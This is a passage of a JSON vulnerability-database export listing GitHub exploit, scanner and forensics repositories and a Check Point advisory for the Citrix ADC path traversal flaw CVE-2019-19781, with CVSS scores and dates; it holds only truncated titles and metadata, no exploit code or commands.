"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T08:52:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-06-21T13:40:35", "id": "6787DC40-24C2-5626-B213-399038EFB0E9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:48", "description": "# CVE-2019-19781\n\u6279\u91cf\u6982\u5ff5\u9a57\u8b49\u7528\n\u4f7f\u7528\u9650\u5236\n----------------------...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T06:09:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-17T06:23:10", "id": "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-16T12:29:54", "description": "# check-cve-2019-19781 \ud83d\udd0e\ud83d\udc1e #\n\n[![GitHub Build Status](https://git...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T00:26:16", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-06-16T11:16:06", "id": "46FA259E-5429-580C-B1D5-D1F09EB90023", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-06T19:18:05", "description": "# Citrix Unauthorized Remote Code Execution Attacker - CVE-2019-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-17T11:52:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-06T16:40:34", "id": "62ED9EA6-B108-5F5A-B611-70CC6C705459", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:17", "description": "# Shitrix-CVE-2019-19781\nMy working approach t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-12T18:53:29", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-21T15:54:44", "id": "2849E613-8689-58E7-9C55-A0616B66C91A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:35:12", "description": "# CVE-2019-19781\r\nAutomated script for Citrix ADC scanner ([CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-27T15:09:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-12-13T12:56:50", "id": "F27B127B-57F0-5352-B92F-B6F921378CBB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:35:48", "description": "# Remote Code Execution Exploit (CVE-2019-19781)- Citrix Applica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T05:17:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-09T05:17:29", "id": "0829A67E-3C24-5D54-B681-A7F72848F524", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:32", "description": "# CVE-2019-19781...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T14:26:02", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-09T14:30:49", "id": "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-16T08:55:18", "description": "# CVE-2019-19781\n\nRemote Code Execution (RCE) in Citrix Applicat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T09:49:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-08-16T08:03:32", "id": "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:41:05", "description": "# Ctirix_RCE-CVE-2019-19781\nCitrix ADC RCE cve-2019-19781\n\n### [...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-29T05:22:47", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-12-06T19:08:34", "id": "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-02T11:58:22", "description": "# Indicator of Compromise Scanner for CVE-2019-19781\n\nThis repos...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-21T15:20:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-02T08:18:59", "id": "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:53:52", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-21T23:13:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-20T11:41:58", "id": "1AB95B23-4916-5338-9CB0-28672888287F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-06T06:34:39", "description": "# CVE-2019-19781\n\nSimple POC to test if your Citrix ADC Netscale...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-30T17:37:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-07-06T03:45:44", "id": "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:24", "description": "# Remote Code Execution Exploit (CVE-2019-19781)- Citrix Applica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T20:43:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-04-19T06:52:48", "id": "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:27:24", "description": "# Citrix Analysis Notebook\n\nA jupyter notebook to aid in automat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T04:59:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-02-21T02:51:51", "id": "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:27:58", "description": "- [CVE-2019-19781 DFIR notes](https://github.com/x1sec/CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-12T23:13:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-10-27T02:49:53", "id": "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:40:41", "description": "# CVE-2019-19781-exploit\nCVE-201...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-27T02:23:02", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-11-07T17:52:31", "id": "09DFDAA9-9EF6-513F-B464-D707B45D598A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:35", "description": "# Update 1-22-2020\nThere is now a tool from FireEye that will he...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-20T18:34:51", "type": "githubexploit", "title": "Exploit for CVE-2019-19871", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19871", "CVE-2019-19781"], "modified": "2021-05-12T19:42:30", "id": "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-06T10:03:57", "description": "# check-your-pulse #\n\n[![GitHub Build Status](https://github.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-16T16:32:47", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781"], "modified": "2022-03-06T07:12:20", "id": "62891769-2887-58A7-A603-BCD5E6A6D6F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:17:58", "description": "A directory traversal vulnerability exists in multiple Citrix products. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-09T00:00:00", "type": "checkpoint_advisories", "title": "Citrix Multiple Products Directory Traversal (CVE-2019-19781)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 